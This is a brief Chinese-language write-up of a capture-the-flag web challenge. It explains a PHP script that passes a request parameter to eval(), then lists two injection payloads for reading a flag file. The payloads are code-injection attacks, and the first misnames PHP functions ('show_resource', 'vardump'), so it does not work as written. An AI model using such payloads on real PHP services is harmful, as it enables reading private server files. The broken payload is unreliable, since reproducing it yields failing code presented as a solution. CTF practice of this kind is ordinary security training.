bugku-web eval

 

 

先分析一下php代码的作用：

     第一行表示包含了一个flag.php文件，也提示我们flag就在该文件中； 

     第二行定义了一个变量a，以$_REQUEST形式接受传递的hello参数；

     第三行中eval()可以将字符串以php代码的形式执行

 

分析完代码作用后解题思路就清晰了起来，我们可以通过eval函数来注入我们想执行的php代码，这里给出两种方法

 

①构造payload：?hello=);show_resource('flag.php');vardump(

    );用来闭合vardump( ,vardump(用来闭合);

 

 

 ②file():可以将整个文件读入数组中

payload：?hello=file("flag.php")